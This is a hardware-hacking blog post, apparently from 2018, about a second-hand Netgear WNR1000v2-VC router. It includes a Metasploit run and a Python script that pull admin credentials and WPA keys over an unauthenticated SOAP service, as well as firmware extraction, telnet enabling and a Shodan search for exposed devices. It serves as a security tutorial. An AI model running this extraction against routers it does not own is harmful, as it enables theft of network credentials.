{"id":1109,"date":"2018-06-04T21:51:43","date_gmt":"2018-06-05T03:51:43","guid":{"rendered":"http:\/\/www.jedge.com\/wordpress\/?p=1109"},"modified":"2018-11-29T08:20:28","modified_gmt":"2018-11-29T14:20:28","slug":"have-fun-at-goodwill-finding-networking-equipment-for-fun-and-profit","status":"publish","type":"post","link":"https:\/\/www.jedge.com\/wordpress\/2018\/06\/have-fun-at-goodwill-finding-networking-equipment-for-fun-and-profit\/","title":{"rendered":"Have fun at Goodwill \u2013 Finding Networking Equipment for Fun and Profit"},"content":{"rendered":"<p><img decoding=\"async\" class=\"alignleft\" src=\"http:\/\/www.jedge.com\/images\/netgear.wnr1000v2.jpg\" alt=\"Netgear WNR1000v2\" \/>A great place to pick up outdated, and potentially vulnerable, wireless routers is your local Goodwill. Depending on the store, the shelves can be packed with devices for only a couple of bucks. While you are there, Google the model number followed by \u201cexploit\u201d or \u201copenwrt\u201d to see whether you have a device worth playing with. Today I picked up a Netgear WNR1000v2; this post details my quick adventures with it.<br \/>\n<!--more--><br \/>\nI performed a <a href=\"https:\/\/kb.netgear.com\/9665\/How-do-I-perform-a-factory-reset-on-my-NETGEAR-router\" target=\"_blank\" rel=\"noopener\">&#8220;factory reset&#8221;<\/a> on the device before I started writing this tutorial. This usually involves a paper clip and holding the recessed reset button on the back of the device for a number of seconds. I then authenticated to the web portal from the LAN segment, identified the firmware version, and enabled Remote Management, which exposes the web interface on the WAN side.<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.jedge.com\/images\/netgear.wnr1000v2.firmware.screenshot.png\" alt=\"Netgear Firmware Version\" \/><\/p>\n<p>This device is running firmware version 1.0.0.3NA. The current version according to the Netgear website is 1.1.2.60NA. 
However, the device also identifies itself as model WNR1000v2-VC, which is a <a href=\"https:\/\/community.netgear.com\/t5\/Wireless-N-Routers\/WNR1000v2-Force-firmware-to-router\/td-p\/434767\" target=\"_blank\" rel=\"noopener\">custom version supplied to Comcast customers<\/a>. The latest firmware for that variant is 1.2.2.73. The device I bought probably hasn&#8217;t been updated since Comcast provided it to the customer. A Google search shows that exploits are available for this device, including a Metasploit module: the router&#8217;s SOAP configuration service hands out the admin credentials and wireless settings without any authentication. Note: Netgear patched the issue in the latest firmware for the WNR1000v2, but the most current WNR1000v2-VC firmware from Comcast is still vulnerable. Remote Management was enabled earlier, which is why the module is pointed at port 8080 here.<br \/>\n<pre><code>msf &gt; use auxiliary\/admin\/http\/netgear_soap_password_extractor\nmsf auxiliary(admin\/http\/netgear_soap_password_extractor) &gt; set RHOST 192.168.50.10\nmsf auxiliary(admin\/http\/netgear_soap_password_extractor) &gt; set RPORT 8080\nmsf auxiliary(admin\/http\/netgear_soap_password_extractor) &gt; run\n\n[*] Trying to access the configuration of the device\n[*] Extracting Firmware version...\n[+] Model WNR1000v2-VC found\n[+] Firmware version V1.0.0.3 found\n[+] Device details downloaded to: \/root\/.msf4\/loot\/20180604125559_default_192.168.50.10_netgear_soap_dev_720162.txt\n[*] Extracting credentials...\n[*] Credentials found, extracting...\n[+] admin \/ Password1 credentials found\n[+] Account details downloaded to: \/root\/.msf4\/loot\/20180604125559_default_192.168.50.10_netgear_soap_acc_391526.txt\n[*] Extracting Wifi...\n[+] Wifi SSID: Mcmanus\n[+] Wifi Encryption: WPA-PSK\/WPA2-PSK\n[*] Extracting WPA Keys...\n[+] Wifi Password: chatham1\n[*] Auxiliary module execution completed<\/code><\/pre><\/p>\n<p>The admin password it recovered (Password1) is one I set myself. The WiFi SSID and WPA-PSK, however, are from the previous owner of the device. 
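<\/p>
<p>What the module does under the hood, as an added example that is not code from the original post or from Metasploit: it POSTs SOAP envelopes to the router with a SOAPAction header naming a NETGEAR-ROUTER service and parses the XML replies. The service URNs and the reply element names (ModelName, NewPassword, NewSSID, NewWPAPassphrase, ...) are assumed from the module and the NETGEAR Genie SOAP API, the SessionID value is an arbitrary placeholder, and the sample reply is constructed, not captured. Pointed at a live router (first argument http:\/\/192.168.50.10:8080, the remote-management port used above) it reports what the device discloses; run with no argument it parses the constructed reply.<\/p>

```python
#!/usr/bin/env python3
"""Query the NETGEAR SOAP configuration service the way
netgear_soap_password_extractor does, without Metasploit.

Added example; not code from the original post or the Metasploit module.
Assumptions (check them against the module source): the service answers
POST / with a SOAPAction of the form "urn:NETGEAR-ROUTER:service:<Svc>:1#<Method>"
and a SessionID element in the SOAP header; reply element names follow the
NETGEAR Genie SOAP API. SAMPLE_REPLY is constructed for the offline test.
"""
import urllib.request
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
SESSION_ID = "A7D88AE69687E58D9A00"  # arbitrary placeholder value

# (service URN, method) in the order the extractor reports things.
QUERIES = [
    ("urn:NETGEAR-ROUTER:service:DeviceInfo:1", "GetInfo"),                    # model, firmware
    ("urn:NETGEAR-ROUTER:service:LANConfigSecurity:1", "GetInfo"),             # admin password
    ("urn:NETGEAR-ROUTER:service:WLANConfiguration:1", "GetInfo"),             # SSID, encryption
    ("urn:NETGEAR-ROUTER:service:WLANConfiguration:1", "GetWPASecurityKeys"),  # WPA passphrase
]
# reply element name -> key used in the report (assumed Genie API names)
FIELDS = {"ModelName": "model", "Firmwareversion": "firmware", "NewPassword": "admin_password",
          "NewSSID": "ssid", "NewBasicEncryptionModes": "encryption",
          "NewWPAPassphrase": "wpa_passphrase"}
SECRETS = ("admin_password", "wpa_passphrase")


def build_request(urn, method, session_id=SESSION_ID):
    """Return (SOAPAction header value, request body) for one query."""
    action = f'"{urn}#{method}"'
    body = ('<?xml version="1.0" encoding="utf-8" standalone="no"?>'
            f'<SOAP-ENV:Envelope xmlns:SOAP-ENV="{SOAP_NS}" '
            'xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">'
            f"<SOAP-ENV:Header><SessionID>{session_id}</SessionID></SOAP-ENV:Header>"
            f'<SOAP-ENV:Body><M1:{method} xmlns:M1="{urn}"></M1:{method}></SOAP-ENV:Body>'
            "</SOAP-ENV:Envelope>")
    return action, body


def parse_reply(text):
    """Collect the FIELDS elements (namespace ignored) from one SOAP reply.

    Absent elements stay absent, so a caller can tell "not disclosed" from "empty";
    a non-XML answer (login page, error text) yields an empty dict.
    """
    try:
        root = ET.fromstring(text)
    except ET.ParseError:
        return {}
    found = {}
    for el in root.iter():
        name = el.tag.rsplit("}", 1)[-1]  # '{ns}Name' -> 'Name'
        if name in FIELDS:
            found[FIELDS[name]] = (el.text or "").strip()
    return found


def is_exposed(found):
    """True when the device disclosed a credential without us authenticating."""
    return any(found.get(k) for k in SECRETS)


def mask(value, keep=2):
    """Report a secret without echoing it in full to a terminal or log."""
    return value[:keep] + "*" * max(len(value) - keep, 0)


def query_device(base_url, timeout=5):
    """Run every query in QUERIES against a live device (network; not used by the test)."""
    found, errors = {}, []
    for urn, method in QUERIES:
        action, body = build_request(urn, method)
        req = urllib.request.Request(base_url.rstrip("/") + "/", data=body.encode(),
                                     headers={"SOAPAction": action, "Content-Type": "text/xml"},
                                     method="POST")
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                found.update(parse_reply(resp.read().decode("utf-8", "replace")))
        except (OSError, ValueError) as exc:  # URLError/HTTPError are OSError subclasses
            errors.append(f"{method}: {exc}")
    return found, errors


# Constructed reply for the offline test; values are the ones the post's Metasploit run
# recovered (SSID/PSK left behind by the previous owner).
SAMPLE_REPLY = f"""<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="{SOAP_NS}"><SOAP-ENV:Body>
 <m:GetInfoResponse xmlns:m="urn:NETGEAR-ROUTER:service:WLANConfiguration:1">
  <NewSSID>Mcmanus</NewSSID>
  <NewBasicEncryptionModes>WPA-PSK/WPA2-PSK</NewBasicEncryptionModes>
  <NewWPAPassphrase>chatham1</NewWPAPassphrase>
 </m:GetInfoResponse>
</SOAP-ENV:Body></SOAP-ENV:Envelope>
"""

if __name__ == "__main__":
    import sys
    found, errors = query_device(sys.argv[1]) if len(sys.argv) > 1 else (parse_reply(SAMPLE_REPLY), [])
    for key, value in found.items():
        print(f"{key:15} {mask(value) if key in SECRETS else value}")
    for err in errors:
        print("error:", err)
    print("unauthenticated disclosure:", is_exposed(found))
```

<p>The script never authenticates: if any of the secret fields comes back, the SOAP interface is reachable without credentials, which is exactly the condition the module exploits, and that is the check to run against your own Netgear before putting it on the Internet. Secrets are masked when printed. On this router the WLAN reply is where the previous owner&#8217;s SSID and PSK came from.<\/p>
<p>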
These settings were not wiped by the &#8220;factory reset&#8221;.<\/p>\n<p>After the module had pulled the wireless SSID and PSK, I also tried a 30-30-30 reset, just to be sure this information really is retained across a factory reset. That involves holding the reset button for 30 seconds with the router powered on, 30 seconds with it powered off, and 30 seconds after powering it back on. NOTE: this did nothing on this device, so follow the Netgear instructions instead. Either way, the WiFi settings survive a reset (at least on firmware v1.0.0.3NA), so a router dropped off at a thrift store still carries its previous owner&#8217;s SSID and WPA key, and anyone with the module above can read them.<\/p>\n<p><strong>Binwalk the Firmware<\/strong><br \/>\nFollow the <a href=\"https:\/\/github.com\/ReFirmLabs\/binwalk\/wiki\/Quick-Start-Guide\" target=\"_blank\" rel=\"noopener\">&#8220;Quick Start Guide&#8221;<\/a> to install binwalk. I downloaded the latest firmware from the Netgear website and extracted the filesystem with binwalk. It finds a single big-endian SquashFS 3.0 image at offset 0xC0 (192 bytes in, after the vendor header) and unpacks it to squashfs-root\/; the banner in etc\/banner gives the game away.<br \/>\n<pre><code>root@:~\/Work\/Hardware.Hacking\/WRN1000v2# binwalk -e WNR1000v2-V1.1.2.60NA.img\n\nDECIMAL       HEXADECIMAL     DESCRIPTION\n--------------------------------------------------------------------------------\n192           0xC0            Squashfs filesystem, big endian, version 3.0, size: 3447077 bytes, 1033 inodes, blocksize: 65536 bytes, created: 2017-06-30 18:29:07\n\nroot@:~\/Work\/Hardware.Hacking\/WRN1000v2# ls _WNR1000v2-V1.1.2.60NA.img.extracted\/squashfs-root\/\nbin                       dev  firmware_region   hardware_version  jffs  mnt          proc  sbin  tmp  var\ndefault_language_version  etc  firmware_version  image             lib   module_name  rom   sys   usr  www\n\nroot@:~\/Work\/Hardware.Hacking\/WRN1000v2\/_WNR1000v2-V1.1.2.60NA.img.extracted\/squashfs-root# cat etc\/banner\n  _______                     ________        __\n |       |.-----.-----.-----.|  |  |  |.----.|  |_\n |   -   ||  _  |  -__|     ||  |  |  ||   _||   _|\n |_______||   __|_____|__|__||________||__| |____|\n          |__| W I R E L E S S   F R E E D O M\n KAMIKAZE (7.09) -----------------------------------\n  * 10 oz Vodka       Shake well with ice and strain\n  * 10 oz Triple sec  mixture into 10 shot glasses.\n  * 10 oz lime juice  Salute!\n ---------------------------------------------------<\/code><\/pre><\/p>\n<p>So we got
a device that runs OpenWrt, though a very old version (Kamikaze 7.09, released in 2007). The good news is that a <a href=\"https:\/\/openwrt.org\/toh\/netgear\/wnr1000_v2\" target=\"_blank\" rel=\"noopener\">current OpenWrt build<\/a> exists for this device.<\/p>\n<p><strong>Serial Port<\/strong><br \/>\nThe OpenWrt wiki page for the device gives a pinout for the serial header, but it is incorrect; the image below shows the proper pinout. So crack open the case, connect a 3.3 V USB-to-serial adapter (GND, TX and RX only, never the adapter&#8217;s VCC pin) and see what is actually on the device. This <a href=\"http:\/\/www.jedge.com\/docs\/netgear.wnr1000v2-VC.bootlog.txt\" target=\"_blank\" rel=\"noopener\">link<\/a> is the boot log of my device.<br \/>\n<img decoding=\"async\" src=\"http:\/\/www.jedge.com\/images\/netgear.wnr1000v2-VC.UART.pinout.jpg\" alt=\"Netgear WNR1000v2 UART Pinout\" \/><\/p>\n<p><strong>Enable Telnet<\/strong><br \/>\nMany Netgear devices running stock firmware let you <a href=\"https:\/\/openwrt.org\/toh\/netgear\/telnet.console\" target=\"_blank\" rel=\"noopener\">enable telnet<\/a>. &#8220;Method 1&#8221; from the wiki does not work on the WNR1000v2-VC: setup.cgi does not exist on this device (I searched for it while connected over serial), so perhaps Comcast removed it. While on the serial console I could see that I could simply enable utelnetd from \/etc\/init.d, but that is not what we are trying to accomplish here. 
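<\/p>
<p>Before sending the magic packet, a closer look at what binwalk matched in the firmware above, as an added example (not code from the original post or from binwalk): a SquashFS superblock begins with the magic 'sqsh' stored in the image&#8217;s byte order, so the bytes sqsh on this big-endian router and hsqs on little-endian images, with the inode count at offset 4 and the major\/minor version at offsets 28 and 30 (offsets assumed from the v3 and v4 superblock layouts). The script scans an image for those magics, discards matches whose fields are nonsense, and carves from the superblock to the end of the file for unsquashfs. The image it builds for itself is constructed; give it the real WNR1000v2-V1.1.2.60NA.img as an argument to see binwalk&#8217;s offset 0xC0, version 3.0 and 1033 inodes reproduced.<\/p>

```python
#!/usr/bin/env python3
"""Find and describe the SquashFS superblock binwalk reported at 0xC0 in
WNR1000v2-V1.1.2.60NA.img, and carve it out for unsquashfs.

Added example; not code from the original post or from binwalk. Only fields
that sit at the same offset in the SquashFS v3 and v4 superblocks are read
(assumption): magic (0), inode count (4), major/minor version (28/30).
The image used when no file is given is constructed, not the real firmware.
"""
import struct

# The 32-bit magic 0x73717368 ('sqsh') as it appears on disk for each byte order.
MAGICS = {b"sqsh": "big", b"hsqs": "little"}
FIELDS_END = 32  # the minor version at offset 30..31 is the last byte we need


def candidates(image):
    """Every offset at which a squashfs magic occurs, with its byte order."""
    hits = []
    for magic, endian in MAGICS.items():
        off = image.find(magic)
        while off != -1:
            hits.append((off, endian))
            off = image.find(magic, off + 1)
    return sorted(hits)


def read_superblock(image, off, endian):
    """Decode inode count and version at off; None if the image is too short."""
    if off + FIELDS_END > len(image):
        return None
    order = ">" if endian == "big" else "<"
    (inodes,) = struct.unpack_from(order + "I", image, off + 4)
    major, minor = struct.unpack_from(order + "HH", image, off + 28)
    return {"offset": off, "endian": endian, "inodes": inodes, "version": (major, minor)}


def plausible(sb):
    """Reject magic strings that merely occur inside other data (compressed payload etc.)."""
    return sb is not None and 1 <= sb["version"][0] <= 4 and sb["inodes"] > 0


def scan(image):
    """All plausible superblocks in image, lowest offset first."""
    found = []
    for off, endian in candidates(image):
        sb = read_superblock(image, off, endian)
        if plausible(sb):
            found.append(sb)
    return found


def carve(image, off):
    """Bytes from the superblock to the end of the image: what unsquashfs takes.
    The vendor header in front of it is why binwalk's offset is not zero."""
    return image[off:]


def make_sample_image():
    """Constructed stand-in for the firmware: 0xC0 bytes of zeroed vendor header, a
    big-endian v3.0 superblock claiming 1033 inodes (the numbers binwalk reported),
    filler, and a decoy little-endian magic whose version field is zero."""
    sb = bytearray(96)
    sb[:4] = b"sqsh"
    struct.pack_into(">I", sb, 4, 1033)
    struct.pack_into(">HH", sb, 28, 3, 0)
    return b"\x00" * 0xC0 + bytes(sb) + b"\xaa" * 64 + b"hsqs" + b"\x00" * 28


if __name__ == "__main__":
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else None
    data = open(path, "rb").read() if path else make_sample_image()
    for sb in scan(data):
        major, minor = sb["version"]
        print(f"{sb['offset']:#x}: squashfs {major}.{minor}, "
              f"{sb['endian']}-endian, {sb['inodes']} inodes")
        if path:  # write <image>.<offset>.squashfs, ready for 'unsquashfs'
            out = f"{path}.{sb['offset']:#x}.squashfs"
            with open(out, "wb") as fh:
                fh.write(carve(data, sb["offset"]))
            print("  carved to", out)
```

<p>Reading the superblock yourself is a useful sanity check because a signature scan will happily report magic strings that happen to occur inside compressed data; the version and inode-count filter above is cheap and drops the decoy in the constructed image. The carved file is what unsquashfs unpacks into squashfs-root\/ (binwalk -e does the same carve for you).<\/p>
<p>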
You can follow the instructions in the wiki for sending the &#8220;Magic Packet&#8221; (telnetenable) to enable telnet: it takes the router&#8217;s LAN IP, its MAC address with the separators removed, and a username and password (the wiki lists which credentials each firmware expects).<br \/>\n<pre><code>C:\\tools&gt;arp -a\n\nInterface: 172.16.0.3 --- 0xc\n  Internet Address      Physical Address      Type\n  172.16.0.1            00-26-f2-eb-56-16     dynamic\n\nC:\\tools&gt;telnetEnable.exe 172.16.0.1 0026F2EB5616 someusername somepassword\n\nC:\\tools&gt;telnet 172.16.0.1\n=== IMPORTANT ============================\nUse &#039;passwd&#039; to set your login password\nthis will disable telnet and enable SSH\n------------------------------------------\n\nBusyBox v1.4.2 (2009-09-09 23:04:26 CST) Built-in shell (ash)\nEnter &#039;help&#039; for a list of built-in commands.\n\n  _______                     ________        __\n |       |.-----.-----.-----.|  |  |  |.----.|  |_\n |   -   ||  _  |  -__|     ||  |  |  ||   _||   _|\n |_______||   __|_____|__|__||________||__| |____|\n          |__| W I R E L E S S   F R E E D O M\n KAMIKAZE (7.09) -----------------------------------\n  * 10 oz Vodka       Shake well with ice and strain\n  * 10 oz Triple sec  mixture into 10 shot glasses.\n  * 10 oz lime juice  Salute!\n ---------------------------------------------------\nroot@WNR1000v2:\/#<\/code><\/pre><\/p>\n<p><strong>Shodan.io<\/strong><br \/>\nSearch Shodan for &#8220;Server: uhttpd\/1.0.0 WNR1000v2&#8221; and you will find far too many of these devices exposed to the Internet, plenty of them on Comcast address space. Any of them still on the Comcast firmware will hand its admin password and WPA key to the module shown above.<\/p>\n<p><strong>Resources<\/strong><br \/>\n<a href=\"https:\/\/www.netgear.com\/support\/product\/WNR1000v2\" target=\"_blank\" rel=\"noopener\">https:\/\/www.netgear.com\/support\/product\/WNR1000v2<\/a><br \/>\n<a href=\"https:\/\/kb.netgear.com\/9665\/How-do-I-perform-a-factory-reset-on-my-NETGEAR-router\" target=\"_blank\" rel=\"noopener\">https:\/\/kb.netgear.com\/9665\/How-do-I-perform-a-factory-reset-on-my-NETGEAR-router<\/a><br \/>\n<a href=\"http:\/\/www.downloads.netgear.com\/files\/GDC\/WNR1000V2\/WNR1000v2-V1.1.2.60NA.zip\" target=\"_blank\" 
rel=\"noopener\">http:\/\/www.downloads.netgear.com\/files\/GDC\/WNR1000V2\/WNR1000v2-V1.1.2.60NA.zip<\/a><br \/>\n<a href=\"https:\/\/community.netgear.com\/t5\/Wireless-N-Routers\/WNR1000v2-Force-firmware-to-router\/td-p\/434767\" target=\"_blank\" rel=\"noopener\">https:\/\/community.netgear.com\/t5\/Wireless-N-Routers\/WNR1000v2-Force-firmware-to-router\/td-p\/434767<\/a><br \/>\n<a href=\"https:\/\/github.com\/ReFirmLabs\/binwalk\/wiki\/Quick-Start-Guide\" target=\"_blank\" rel=\"noopener\">https:\/\/github.com\/ReFirmLabs\/binwalk\/wiki\/Quick-Start-Guide<\/a><br \/>\n<a href=\"https:\/\/openwrt.org\/toh\/netgear\/telnet.console\" target=\"_blank\" rel=\"noopener\">https:\/\/openwrt.org\/toh\/netgear\/telnet.console<\/a><br \/>\n<a href=\"https:\/\/openwrt.org\/toh\/netgear\/wnr1000_v2\" target=\"_blank\" rel=\"noopener\">https:\/\/openwrt.org\/toh\/netgear\/wnr1000_v2<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>A great place to pick up outdated, and potentially vulnerable, wireless routers is your local Goodwill. Depending on the store those shelves can be packed with devices for only a couple bucks. 
While you are there you can just Google the model number followed by \u201cexploit\u201d or \u201copenwrt\u201d to see if you have a device [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[163,114],"tags":[36,175,123],"class_list":["post-1109","post","type-post","status-publish","format-standard","hentry","category-hacking","category-hardware-hacking","tag-metasploit","tag-netgear","tag-openwrt"],"_links":{"self":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/posts\/1109","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/comments?post=1109"}],"version-history":[{"count":10,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/posts\/1109\/revisions"}],"predecessor-version":[{"id":1157,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/posts\/1109\/revisions\/1157"}],"wp:attachment":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/media?parent=1109"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/categories?post=1109"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/tags?post=1109"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}